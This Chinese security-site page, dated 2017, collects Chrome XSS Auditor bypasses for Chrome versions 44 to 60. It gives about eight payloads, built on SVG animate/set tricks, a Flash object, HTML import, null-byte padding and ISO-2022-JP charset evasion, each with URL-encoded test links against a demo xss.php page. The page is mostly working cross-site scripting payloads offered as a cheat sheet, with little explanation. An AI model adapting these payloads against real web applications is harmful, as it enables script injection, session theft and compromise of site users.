欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

浏览器安全 / Chrome XSS Auditor bypass

来源:本站整理 作者:佚名 时间:2017-08-15 TAG: 我要投稿

Universal Bypass 5
最新版 Chrome 60
context = null
test
http://mhz.pw/game/xss/xss.php?xss=%3c%62%72%3e%00%00%00%00%00%00%00%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
Bypass 4 (需交互的bypass)
chrome 60
?c=svg>animate href=#x attributeName=href values= javascript:alert(1) />a id=x>rect width=100 height=100 />a>
// or
?c=svg width=10000px height=10000px>a>rect width=10000px height=10000px z-index=9999999 />animate attributeName=href values=javascript:alert(1)>
test
http://mhz.pw/game/xss/xss.php?xss=%3Csvg%3E%3Canimate%20href%3D%23x%20attributeName%3Dhref%20values%3D%26%23x3000%3Bjavascript%3Aalert%281%29%20%2F%3E%3Ca%20id%3Dx%3E%3Crect%20width%3D100%20height%3D100%20%2F%3E%3C%2Fa%3E
http://mhz.pw/game/xss/xss.php?xss=%3Csvg%20width%3D10000px%20height%3D10000px%3E%3Ca%3E%3Crect%20width%3D10000px%20height%3D10000px%20z-index%3D9999999%20%2F%3E%3Canimate%20attributeName%3Dhref%20values%3Djavas%26%2399ript%3Aalert%281%29%3E
Bypass 3 via flash
只要支持flash的chrome版本(到Chrome 56),均可使用。
context = support flash

object allowscriptaccess=always> param name=url value=http://mhz.pw/game/xss/alert.swf>
test
http://mhz.pw/game/xss/xss.php?xss=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=url%20value=http%3A%2F%2Fmhz.pw%2Fgame%2Fxss%2Falert.swf%3E
Universal Bypass 2
到Chrome 55/56可用, 无任何条件,只要输出在页面中即可执行代码。
context = null

?xss=svg>set href=#script attributeName=href to=data:,alert(document.domain) />script id=script src=foo>script>
test

http://mhz.pw/game/xss/xss.php?xss=%3Csvg%3E%3Cset%20href%3D%23script%20attributeName%3Dhref%20to%3Ddata%3A%2Calert(document.domain)%20%2F%3E%3Cscript%20id%3Dscript%20src%3Dfoo%3E%3C%2Fscript%3E
Universal Bypass 1
到Chrome 55/56可用,无任何条件,只要输出在页面中即可执行代码。
context = null

?xss=
test
http://mhz.pw/game/xss/xss.php?xss=%3Clink%20rel%3D%22import%22%20href%3D%22https%3Awww.leavesongs.com%2Ftestxss%22
Chrome 59 && 输出点后面有空格的情况
context:
header('X-XSS-Protection: 1; mode=block'); 
echo "{$_GET['html']} ";
test
http://mhz.pw/game/xss/xss2.php?html=%3Cscript%3Ealert%28%29%3C/script
Chrome 44/45 + 属性中输出的情况
https://code.google.com/p/chromium/issues/detail?id=526104
chrome 45+ fixed
context:
html> 
 head>
  title>XSSAuditor bypasstitle>
 head>
body> 
    form>
    input type="text" value="input=foo'?>">
    form>
body> 
html>
payload:

">script>prompt(/XSS/);1%02script
test
http://mhz.pw/game/xss/attr.php?xss=%22%3E%3Cscript%3Eprompt(%2FXSS%2F)%3B1%2502%3Cscript%3C%2Fscript%3E
无charset Bypass
没有输出charset的情况下,可以通过制定字符集来绕过auditor。
老版的这个编码:ISO-2022-KR,可用 onerror%0f=alert(1) bypass,但现在版本已经没用这个编码,所以该payload只适用于老版本chrome。
新版中,有这个编码:ISO-2022-JP,可以在关键处中加入 %1B%28B,会被省略。
context:
echo $_GET['xss'];
payload:
老版:

xss=%3Cmeta%20charset=ISO-2022-JP%3E%3Csvg%20onload%0f=alert(1)%3E
新版:

xss=%3Cmeta%20charset=ISO-2022-JP%3E%3Csvg%20onload%1B%28B=alert(1)%3E

[1] [2] [3]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载